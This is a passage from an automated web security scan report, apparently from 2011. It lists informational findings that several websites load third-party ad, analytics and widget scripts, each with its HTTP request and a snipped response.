<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.latest.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.easing.1.1.1.js"></script>
<script type="text/javascript" src="http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.182. http://medienfreunde.com/lab/innerfade/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://medienfreunde.com
Path:	/lab/innerfade/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /lab/innerfade/ HTTP/1.1
Host: medienfreunde.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 14265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">

   <hea
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                   </script>
...[SNIP]...
</script>
                   <script type="text/javascript"
                    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                   </script>
...[SNIP]...
</script>
   <script type="text/javascript"
    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
   </script>
...[SNIP]...
</script>
   <script type="text/javascript"
    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
   </script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                   </script>
...[SNIP]...

18.183. http://mir.aculo.us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mir.aculo.us
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://platform.twitter.com/widgets.js

Request

GET / HTTP/1.1
Host: mir.aculo.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Wed, 02 Feb 2011 15:34:38 GMT
Content-Type: text/html
Content-Length: 42066
Last-Modified: Wed, 02 Feb 2011 15:33:00 GMT
Connection: close
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</div>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

18.184. http://mofones.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mofones.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET / HTTP/1.1
Host: mofones.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL"
X-Tumblr-User: morrisamaltz
Link: <http://26.media.tumblr.com/avatar_f6a355d02537_16.png>; rel=icon
Vary: Accept-Encoding
X-Tumblr-Usec: D=348333
Content-Type: text/html; charset=UTF-8
Content-Length: 81021
Date: Wed, 02 Feb 2011 19:29:24 GMT
X-Cache: MISS from rack1.tumblr.com
X-Cache-Lookup: MISS from rack1.tumblr.com:80
Via: 1.0 rack1.tumblr.com:80 (squid/2.6.STABLE6)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--

.
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.185. http://montanaplates.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://montanaplates.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET / HTTP/1.1
Host: montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.186. http://montanaplates.com/209194-Twitter-Tweets-about-Montana-LLC-as-of-January-31-2011.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://montanaplates.com
Path:	/209194-Twitter-Tweets-about-Montana-LLC-as-of-January-31-2011.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /209194-Twitter-Tweets-about-Montana-LLC-as-of-January-31-2011.html HTTP/1.1
Host: montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.187. http://montanaplates.com/287485-Are-you-Scaring-away-Potential-Customers.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://montanaplates.com
Path:	/287485-Are-you-Scaring-away-Potential-Customers.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /287485-Are-you-Scaring-away-Potential-Customers.html HTTP/1.1
Host: montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.188. http://montanaplates.com/315548-Twitter-Tweets-about-Llc-as-of-January-29-2011.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://montanaplates.com
Path:	/315548-Twitter-Tweets-about-Llc-as-of-January-29-2011.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /315548-Twitter-Tweets-about-Llc-as-of-January-29-2011.html HTTP/1.1
Host: montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.189. http://montanaplates.com/354683-Twitter-Tweets-about-Montana-LLC-as-of-January-28-2011.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://montanaplates.com
Path:	/354683-Twitter-Tweets-about-Montana-LLC-as-of-January-28-2011.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /354683-Twitter-Tweets-about-Montana-LLC-as-of-January-28-2011.html HTTP/1.1
Host: montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.190. http://montanaplates.com/490605-Is-your-Credit-Policy-Working.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://montanaplates.com
Path:	/490605-Is-your-Credit-Policy-Working.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /490605-Is-your-Credit-Policy-Working.html HTTP/1.1
Host: montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.191. http://montanaplates.com/530262-How-Important-is-a-Credit-Policy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://montanaplates.com
Path:	/530262-How-Important-is-a-Credit-Policy.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /530262-How-Important-is-a-Credit-Policy.html HTTP/1.1
Host: montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.192. http://montanaplates.com/586605-Twitter-Tweets-about-Montana-LLC-as-of-January-19-2011.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://montanaplates.com
Path:	/586605-Twitter-Tweets-about-Montana-LLC-as-of-January-19-2011.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /586605-Twitter-Tweets-about-Montana-LLC-as-of-January-19-2011.html HTTP/1.1
Host: montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16585

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.193. http://montanaplates.com/803874-Twitter-Tweets-about-Llc-as-of-January-27-2011.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://montanaplates.com
Path:	/803874-Twitter-Tweets-about-Llc-as-of-January-27-2011.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /803874-Twitter-Tweets-about-Llc-as-of-January-27-2011.html HTTP/1.1
Host: montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.194. http://montanaplates.com/826400-Trusting-Your-Gut.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://montanaplates.com
Path:	/826400-Trusting-Your-Gut.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /826400-Trusting-Your-Gut.html HTTP/1.1
Host: montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.195. http://montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://montanaplates.com
Path:	/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html HTTP/1.1
Host: montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.196. http://montanaplates.com/archive-2010-02.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://montanaplates.com
Path:	/archive-2010-02.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /archive-2010-02.html HTTP/1.1
Host: montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.197. http://montanaplates.com/archive-2010-05.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://montanaplates.com
Path:	/archive-2010-05.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /archive-2010-05.html HTTP/1.1
Host: montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
